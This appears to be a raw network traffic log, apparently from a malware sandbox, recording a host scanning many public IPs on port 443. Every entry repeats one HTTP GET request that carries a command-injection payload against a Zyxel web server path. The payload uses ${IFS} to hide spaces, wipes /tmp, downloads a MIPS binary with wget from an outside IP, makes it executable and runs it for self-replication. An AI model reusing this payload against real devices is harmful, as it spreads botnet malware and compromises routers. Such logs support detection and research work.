                                      Jan 14, 2024 15:50:45.280191898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4096192.168.2.1449466123.195.69.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.280234098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4097192.168.2.1453028177.126.228.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.280283928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4098192.168.2.146084232.50.200.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.280380011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4099192.168.2.144466488.85.221.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.280467033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4100192.168.2.143761091.91.226.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.280504942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4101192.168.2.1439944188.13.8.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.280553102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4102192.168.2.1439826113.82.88.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.280606985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4103192.168.2.145133445.160.162.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.280647039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4104192.168.2.1449112196.95.168.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.280690908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4105192.168.2.1444722153.220.121.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.280736923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4106192.168.2.1437308152.211.210.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.280797005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4107192.168.2.144601686.191.227.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.280867100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4108192.168.2.143928424.228.237.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.280888081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4109192.168.2.143606694.183.132.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.280958891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4110192.168.2.144369846.0.17.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.281032085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4111192.168.2.144986089.76.150.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.281071901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4112192.168.2.144309872.107.115.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.281142950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4113192.168.2.145962258.246.204.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.281214952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4114192.168.2.1447310101.199.149.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.281295061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4115192.168.2.1448602182.210.117.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.281337023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4116192.168.2.143883296.159.214.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.281426907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4117192.168.2.1455720100.30.234.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.281445026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4118192.168.2.145273487.166.180.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.281517029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4119192.168.2.1445450103.102.56.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.281563997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4120192.168.2.1439564144.218.88.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.281604052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4121192.168.2.144412094.33.51.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.281678915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4122192.168.2.144743049.239.91.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.281734943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4123192.168.2.144423438.23.7.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.281778097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4124192.168.2.144872276.100.124.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.281810045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4125192.168.2.1460396143.27.35.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.281882048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4126192.168.2.1454356103.55.64.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.281924009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4127192.168.2.144950065.42.126.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.281970024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4128192.168.2.143912413.81.168.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.282015085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4129192.168.2.1449802169.10.218.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.282064915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4130192.168.2.1460302100.132.45.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.282138109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4131192.168.2.1448658161.106.193.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.282171965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4132192.168.2.145041072.207.51.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.282212973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4133192.168.2.1439364130.183.63.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.282290936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4134192.168.2.145014298.128.82.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.282319069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4135192.168.2.14388829.184.240.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.282380104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4136192.168.2.1434358126.241.138.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.282428026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4137192.168.2.1437230133.117.243.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.282483101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4138192.168.2.1447824128.116.235.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.282541037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4139192.168.2.144125851.244.85.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.282603025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4140192.168.2.144886461.30.189.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.282649994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4141192.168.2.1444494149.153.194.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.282701015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4142192.168.2.143594217.134.5.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.282735109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4143192.168.2.145683692.121.12.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.282780886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4144192.168.2.1438802141.120.208.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.282838106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4145192.168.2.1449884120.171.190.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.282898903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4146192.168.2.1436616143.65.154.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.282953978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4147192.168.2.1439476167.15.68.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.283027887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4148192.168.2.145815672.154.116.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.283085108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4149192.168.2.1456514160.248.212.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.283128977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4150192.168.2.143579064.232.36.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.283190966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4151192.168.2.144082475.133.250.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.283226967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4152192.168.2.1454258160.113.201.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.283283949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4153192.168.2.144740075.90.55.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.283348083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4154192.168.2.145438219.209.109.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.283381939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4155192.168.2.1455886165.213.117.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.283418894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4156192.168.2.144004413.187.95.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.283480883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4157192.168.2.145820671.133.27.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.283541918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4158192.168.2.145267234.44.53.195443
                                      TimestampBytes transferredDirectionData
